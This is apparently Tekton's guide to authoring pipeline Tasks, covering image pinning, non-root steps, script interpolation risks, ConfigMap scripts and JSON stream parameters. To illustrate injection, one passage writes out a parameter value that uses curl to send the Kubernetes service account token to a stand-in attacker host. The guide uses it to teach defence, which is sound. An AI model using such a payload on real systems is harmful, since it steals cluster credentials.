# Task Authoring Recommendations

This is a collection of recommendations for developers authoring Tasks, with
justifications for why they are recommended.

These are just _recommendations_, and there may be situations where the
recommendation cannot or should not be followed.

This is a living document. Recommendations may be added in the future, or
existing recommendations may change or be clarified.

If you have a question or would like to add a recommendation, please [file an
issue](https://github.com/tektoncd/catalog/issues/new).

## Reference Images by Digest

Where possible, an image used in a step should be referenced by digest (e.g.,
`busybox@sha256:abcde...`) instead of by tag (`busybox:latest`). This ties the
Task to an exact version of the image, and prevents unexpected
changes.

Referencing by tag (`:latest` or `:v1.2.3`) means that an owner of that image
can push a new image to that tag, and all Tasks that reference the image by
that tag will start using it immediately. This can lead to unexpected Task
failures, or silent behavior changes, including security-sensitive changes.
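Because a digest reference has a fixed shape, pinning can be checked mechanically, for example in a catalog lint step. The sketch below is a minimal version under stated assumptions: the Task has already been parsed into a Python dict (for example with a YAML library), only `sha256` digests are recognised, and the names `is_pinned_by_digest` and `unpinned_images` are hypothetical helpers, not part of any Tekton tool.

```python
import re

# A digest reference ends in "@sha256:" followed by 64 lowercase hex characters.
# A tag may also be present (e.g. "busybox:1.36@sha256:..."); the digest is what pins it.
DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")


def is_pinned_by_digest(image: str) -> bool:
    """Return True if the image reference is pinned to a sha256 digest."""
    return DIGEST_RE.search(image) is not None


def unpinned_images(task: dict) -> list[str]:
    """List the images of a parsed Task's steps that are referenced by tag only."""
    steps = task.get("spec", {}).get("steps", [])
    return [s["image"] for s in steps if not is_pinned_by_digest(s["image"])]


task = {
    "spec": {
        "steps": [
            {"name": "a", "image": "busybox:latest"},
            {"name": "b", "image": "busybox@sha256:" + "0" * 64},
            {"name": "c", "image": "localhost:5000/tools:v1.2.3"},
        ]
    }
}
print(unpinned_images(task))  # ['busybox:latest', 'localhost:5000/tools:v1.2.3']
```

Matching on the digest suffix, rather than splitting on `:`, avoids misreading a registry port such as `localhost:5000` as a tag.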

## Run as non-root and non-privileged

One of the security best practices for containers is to run them as a
non-root user. This is usually achieved by defining a user in your
image and setting it with the `USER` instruction in your image
configuration. See
[here](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user)
for details on best practices with `Dockerfile`s.

You should also avoid running containers as
[privileged](https://stackoverflow.com/questions/36425230/privileged-containers-and-capabilities)
as much as possible.

> The --privileged flag gives all capabilities to the container, and
> it also lifts all the limitations enforced by the device cgroup
> controller. In other words, the container can then do almost
> everything that the host can do. This flag exists to allow special
> use-cases, like running Docker within Docker.

In the catalog, this means that you should, where possible:
- **ensure the image you are using can run as non-root**; any step
  that does not explicitly specify that it needs to run as root
  should work when running as a non-root user.
- if your step really needs to run as root, specify it in the task
  using
  [`securityContext`](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/);
  the same applies to `privileged`.

  ```yaml
  # […]
    steps:
    - name: foo
      image: myimage
      securityContext:
        runAsUser: 0 # root uid == 0
        privileged: true
  ```
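Because root and privileged steps are declared explicitly, reviewers can list them mechanically. A minimal sketch, assuming the Task has already been parsed into a Python dict; the helper name is hypothetical, and it only inspects step-level `securityContext`, not pod-level settings or the image's own `USER`.

```python
def steps_requesting_root_or_privileged(task: dict) -> dict[str, list[str]]:
    """Map each step that explicitly asks for root or privileged mode to its reasons."""
    flagged: dict[str, list[str]] = {}
    for step in task.get("spec", {}).get("steps", []):
        ctx = step.get("securityContext") or {}
        reasons = []
        if ctx.get("runAsUser") == 0:
            reasons.append("runAsUser: 0")
        if ctx.get("privileged") is True:
            reasons.append("privileged: true")
        if reasons:
            flagged[step["name"]] = reasons
    return flagged


# The step from the YAML example above, plus an ordinary step.
task = {
    "spec": {
        "steps": [
            {
                "name": "foo",
                "image": "myimage",
                "securityContext": {"runAsUser": 0, "privileged": True},
            },
            {"name": "bar", "image": "myimage"},
        ]
    }
}
print(steps_requesting_root_or_privileged(task))
# {'foo': ['runAsUser: 0', 'privileged: true']}
```

Every step that is not flagged is then expected to work as a non-root user.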

## Remember that there are languages other than sh and bash

Yes, sh and bash are DSLs for running processes, but sometimes other
languages are better suited to what you're trying to do. One of Tekton
Pipelines' main strengths is the ability to have the right tool
available for every step, including the _interpreter_. Use Python or
another scripting language when that is warranted.

A Python example:

```yaml
  steps:
    - name: foo
      image: python:alpine
      env:
        - name: PARAM_ONE
          value: $(params.one)
      script: |
        #!/usr/bin/env python3
        import os
        print(os.getenv('PARAM_ONE'))
```

## Don't use interpolation in scripts or string arguments

Using Tekton's `$(...)` interpolation (for example `$(params.one)`) in the
`script` or in a `sh -c` string is extremely fragile. The interpolation
done by Tekton is not aware of the context in which it happens. A space, a
quote, a backslash or a newline could easily break an otherwise
beautiful script.

```yaml
  steps:
  - name: foo
    image: myimage
    script: |
      echo $(params.one)
```

If `params.one` happens to contain a single quote (say, the value is just
`'`), then the resulting shell script looks like this:

```
echo '
```

This script is not valid, and the task will fail:

```
sh: 1: Syntax error: Unterminated quoted string
```

This applies to standard shell scripts, Python scripts or any other
script where Tekton ends up interpolating variables. Different
languages have different quoting rules in different contexts, but a
maliciously formed parameter would be able to break out of any
quoting.

No amount of escaping will be airtight, not even Python's `"""` strings.
A maliciously formed parameter just needs to include another `"""` to
close the string:

```yaml
    script: |
      #!/usr/bin/env python3
      value = """$(params.one)"""
      print(value)
```

If the parameter has the value `"""` followed by a line break, then
anything after that line break will be interpreted as **Python code**,
probably causing the script to fail, or worse.
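The effect can be checked without running anything. In this minimal sketch, `interpolate` is a hypothetical stand-in for Tekton's substitution that does plain text replacement (the property that matters here), and the resulting source is only parsed with `ast`, never executed. The benign value yields the two expected statements; the hostile one smuggles in extra statements.

```python
import ast

# The script body from the example above, before $(params.one) is substituted.
TEMPLATE = 'value = """$(params.one)"""\nprint(value)\n'


def interpolate(template: str, params: dict[str, str]) -> str:
    """Hypothetical stand-in for Tekton's substitution: plain text replacement."""
    for name, value in params.items():
        template = template.replace(f"$(params.{name})", value)
    return template


def statement_kinds(source: str) -> list[str]:
    """Parse (never run) the source and name each top-level statement."""
    return [type(node).__name__ for node in ast.parse(source).body]


benign = interpolate(TEMPLATE, {"one": "hello"})
# The value closes the string, adds its own statements, then opens a new
# string to swallow the template's closing quotes.
hostile = interpolate(TEMPLATE, {"one": '"""\nimport os\nos.system("id")\nx = """'})

print(statement_kinds(benign))   # ['Assign', 'Expr']
print(statement_kinds(hostile))  # ['Assign', 'Import', 'Expr', 'Assign', 'Expr']
```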

Instead, use environment variables or arguments, which are not
interpolated into the script source code:

```yaml
  steps:
  - name: foo
    image: myimage
    env:
      - name: PARAM_ONE
        value: $(params.one)
    args:
      - $(params.one)
    script: |
      printf '%s\n' "$PARAM_ONE"
      printf '%s\n' "$1"
```

The script now prints the value of `params.one` correctly, whatever it
contains, through both the environment variable and the argument.
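The same property holds for a Python `script`. A minimal sketch that runs a stand-in script with the current interpreter and passes an awkward value through both channels used in the YAML above, an environment variable and a command-line argument; `SCRIPT` and the value are illustrative only.

```python
import os
import subprocess
import sys

# The script never contains the value in its source; it only reads it at run
# time, from the environment (like PARAM_ONE) and from argv (like args / $1).
SCRIPT = "import os, sys\nprint(os.environ['PARAM_ONE'])\nprint(sys.argv[1])\n"

# A deliberately awkward value: quotes, a triple quote, a newline, a $(...) and a backslash.
value = 'it\'s """\n$(cat /etc/hostname) \\'

result = subprocess.run(
    [sys.executable, "-c", SCRIPT, value],
    env={**os.environ, "PARAM_ONE": value},
    capture_output=True,
    text=True,
    check=True,
)
print(result.stdout == f"{value}\n{value}\n")  # True
```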

It is worth mentioning that an interpolated script (i.e. one that contains
a reference such as `$(params.one)`) is a security problem. If an attacker
is able to send in a parameter value such as
`$(curl -s http://attacker.example.com/?value=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token))`,
the attacker would be able to exfiltrate the service account token for the
TaskRun.
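The difference is easy to reproduce locally. A minimal sketch, assuming a POSIX `sh` on the `PATH` and using `$(echo INJECTED)` as a harmless stand-in for the `curl` payload: pasting the value into the script text runs the command substitution, while passing it as an argument (as `args` and `$1` do in the Tekton example) prints it verbatim.

```python
import subprocess

# Harmless stand-in for the attacker's payload: a shell command substitution.
param = "$(echo INJECTED)"

# Unsafe: the value is pasted into the script text, as interpolation does.
unsafe = subprocess.run(
    ["sh", "-c", f"echo {param}"], capture_output=True, text=True, check=True
)

# Safe: the script text is fixed and the value arrives as $1
# (the "sh" placeholder after the script becomes $0).
safe = subprocess.run(
    ["sh", "-c", 'printf "%s\\n" "$1"', "sh", param],
    capture_output=True,
    text=True,
    check=True,
)

print(unsafe.stdout, end="")  # INJECTED
print(safe.stdout, end="")    # $(echo INJECTED)
```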

## Extract task code (scripts) to their own files

As a task grows in complexity, it becomes harder and harder to
maintain it inline. Because you have already avoided interpolation
in the script, there is no real need for the script to be inlined
into the Task.

Use a ConfigMap for your script, and mount the ConfigMap in the task.
Use a single _command:_ that executes your script (optionally with
environment variables and arguments):

```yaml
  volumes:
  - name: scripts
    configMap:
      name: my-task-scripts
      defaultMode: 0755
  steps:
  - name: foo
    image: myimage
    volumeMounts:
    - name: scripts
      mountPath: /mnt/scripts
    command:
    - /mnt/scripts/my-command.sh
```

This allows you to create and update your ConfigMap from a real
script file, which you can edit stand-alone instead of inline in a
Tekton Task YAML file. This gives you better editor completion, syntax
checking, and many other benefits. You can even run the script locally.

```bash
#!/bin/bash
# my-command.sh
echo "${PARAM_ONE-Hello world}"
```

To create the configmap:

```sh
kubectl create configmap my-task-scripts --from-file=my-command.sh
```

For bonus points, use a kustomize generator to create the ConfigMap
alongside your Task; this lets you deploy everything with a simple
`kubectl apply -k`.

## Test and verify your task code

Use sound engineering principles when building Tekton Task code.
Since the code can reside in external files, you can split it up and
write test harnesses that exercise its various code paths. Have a
build system run the task's test harness whenever you change the code,
before you commit, and of course a Tekton Pipeline that verifies the
tests pass before merging.
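As an illustration, a harness for the `my-command.sh` script from the previous section could be as small as the sketch below, written as plain `pytest`-style test functions. It assumes `bash` is available locally and inlines the script for self-containment; in a real repository the test would read `my-command.sh` from disk. The helper `run_script` is hypothetical.

```python
import os
import subprocess
import tempfile

# Contents of my-command.sh from the example above.
MY_COMMAND = '#!/bin/bash\n# my-command.sh\necho "${PARAM_ONE-Hello world}"\n'


def run_script(source: str, extra_env: dict[str, str]) -> str:
    """Write the script to a temp file, run it with bash and return its stdout."""
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as f:
        f.write(source)
        path = f.name
    try:
        # Start from the current environment, minus any PARAM_ONE that leaked in.
        env = {k: v for k, v in os.environ.items() if k != "PARAM_ONE"}
        env.update(extra_env)
        result = subprocess.run(
            ["bash", path], env=env, capture_output=True, text=True, check=True
        )
        return result.stdout
    finally:
        os.unlink(path)


def test_default_value():
    assert run_script(MY_COMMAND, {}) == "Hello world\n"


def test_value_with_quotes_and_spaces():
    value = 'it\'s a "quoted" value'
    assert run_script(MY_COMMAND, {"PARAM_ONE": value}) == value + "\n"
```

Running `pytest` on this file before each commit, and again in a Tekton Pipeline before merging, covers both halves of the recommendation.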

## Create idempotent tasks and pipelines

When you design tasks and pipelines, they should, as much as possible,
be written in an idempotent manner. An idempotent task can safely be
re-executed, and this can be used to your advantage. If designed
properly, it can also allow you to skip work that has already happened
(see the "level-based" approach below).

## Clearly define the format of input parameters and results

Specify the format when defining parameters and results, even down to
trailing whitespace.  Specify the intention behind them.  For
parameters, indicate if there are other tasks that might have an output
that matches.  For a result, indicate where you might use the result.

This is especially important when building tasks that may be composed
in different ways, and where the results of some tasks are intended to
be the parameters to other tasks.
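To make the whitespace point concrete: a consumer, or a test of the producing task, can check a result against its documented format exactly. A minimal sketch for a hypothetical `commit` result documented as "40 lowercase hex characters, no trailing newline". A value written with `echo` carries a trailing newline and is rejected, while one written with `printf '%s'` is accepted.

```python
import re

# Hypothetical documented format for a "commit" result:
# exactly 40 lowercase hex characters, with no trailing newline or whitespace.
COMMIT_RESULT = re.compile(r"[0-9a-f]{40}")


def is_valid_commit_result(value: str) -> bool:
    """Check a result value against the documented format, whitespace included."""
    # fullmatch rejects a trailing "\n", unlike a "$" anchor used with re.match.
    return COMMIT_RESULT.fullmatch(value) is not None


sha = "0123456789abcdef0123456789abcdef01234567"
print(is_valid_commit_result(sha))         # True
print(is_valid_commit_result(sha + "\n"))  # False
```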

## Use composable parameter formats

Especially when passing lists of items between tasks (i.e. a list of
items from one task, designed to be the parameter of another task),
avoid using structured strings, tab-separated values, or even
line-separated values. Such formats are prone to errors from simple
whitespace mistakes, or from a rogue value that contains a hard-to-detect
newline.

Instead, use a more structured data format such as a JSON stream or,
more formally, [JSON Text Sequences (RFC
7464)](https://tools.ietf.org/html/rfc7464), and use `jq` to process the
different _records_ that are passed in to a task. This lets you pass
almost any conceivable type of data without escaping issues.

```yaml
# task foo
  steps:
  - name: foo
    image: myimage
    script: |
      echo '{"value": 123}' >> $(results.data.path)

# task bar
  steps:
  - name: bar
    image: myimage
    script: |
      printf '{"size": "large"}' >> $(results.data.path)
      printf '{"size": "small", "fake": true}' >> $(results.data.path)

# pipeline
  - name: example
    taskRef:
      kind: Task
      name: pipeline
    params:
    - name: data
      value: |
        $(tasks.foo.results.data)
        $(tasks.bar.results.data)
```

Here, the "foo" and "bar" task results and the "data" parameter of the
pipeline have been defined to be _of type JSON Stream_, allowing the
pipeline author to construct the pipeline parameter value directly by
concatenating the results.  This construct does not fall apart when
the data is on one line or split on multiple lines.
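`jq` reads such a stream natively. For a consuming step written in Python, a minimal sketch of the same idea uses the standard library's `json.JSONDecoder.raw_decode` to pull one value at a time. It handles whitespace-separated or directly concatenated values; the `iter_json_stream` name is hypothetical, and the `data` string only approximates what the pipeline above would assemble.

```python
import json
from typing import Any, Iterator


def iter_json_stream(text: str) -> Iterator[Any]:
    """Yield each JSON value in `text`, whether separated by newlines, spaces or nothing."""
    decoder = json.JSONDecoder()
    pos = 0
    while True:
        # raw_decode does not skip leading whitespace, so skip it here.
        while pos < len(text) and text[pos].isspace():
            pos += 1
        if pos == len(text):
            return
        value, pos = decoder.raw_decode(text, pos)
        yield value


# Roughly the "data" parameter: foo's result (newline-terminated, from echo)
# followed by bar's two records (written with printf, no newlines).
data = '{"value": 123}\n\n{"size": "large"}{"size": "small", "fake": true}\n'

for record in iter_json_stream(data):
    print(record)
```

Because record boundaries come from the JSON syntax itself, a value containing newlines or tabs cannot be mistaken for a separator.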

## Use "level-based" approach to your advantage

If you have a task that creates another PipelineRun in order to
complete its work, you should leverage the fact that `kubectl apply`
has "create-or-update" semantics. Applying a PipelineRun that already
exists (with the same spec) does not start a new run, so the pipeline
is not re-run.

For example, if you have a task that takes a commit as a parameter,
say `abc123def`, and its job is to create a PipelineRun with that
commit as a parameter (and the other pipeline is idempotent, and does
not need to be re-run for the same commit), then you could _apply_ the
PipelineRun `run-abc123def`. The first time, `run-abc123def` won't
exist, so a PipelineRun will be created, running the pipeline. If,
at a later point in time, the task happens to run with the same
commit, it will again _apply_ the PipelineRun `run-abc123def`. Since
it already exists, nothing happens.

This technique can be used to "short circuit" work when it is not
necessary to _re-run_.
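The key ingredient is a PipelineRun name derived only from the input. A minimal sketch under stated assumptions: the Pipeline name `build-commit` and the `commit` parameter are hypothetical, and `toy_apply` is a toy in-memory model of `kubectl apply` keyed by name, not a real client. In an actual step, the JSON manifest could be piped to `kubectl apply -f -`.

```python
import json


def pipelinerun_for_commit(commit: str) -> dict:
    """Build a PipelineRun whose name depends only on the commit."""
    return {
        "apiVersion": "tekton.dev/v1",
        "kind": "PipelineRun",
        "metadata": {"name": f"run-{commit}"},
        "spec": {
            "pipelineRef": {"name": "build-commit"},  # hypothetical Pipeline
            "params": [{"name": "commit", "value": commit}],
        },
    }


def toy_apply(cluster: dict, manifest: dict) -> str:
    """Toy model of `kubectl apply` create-or-update semantics, keyed by name."""
    name = manifest["metadata"]["name"]
    if name not in cluster:
        cluster[name] = manifest
        return "created"
    if cluster[name] == manifest:
        return "unchanged"
    cluster[name] = manifest
    return "configured"


cluster: dict = {}
print(toy_apply(cluster, pipelinerun_for_commit("abc123def")))  # created
print(toy_apply(cluster, pipelinerun_for_commit("abc123def")))  # unchanged
print(json.dumps(pipelinerun_for_commit("abc123def")))  # manifest for kubectl apply -f -
```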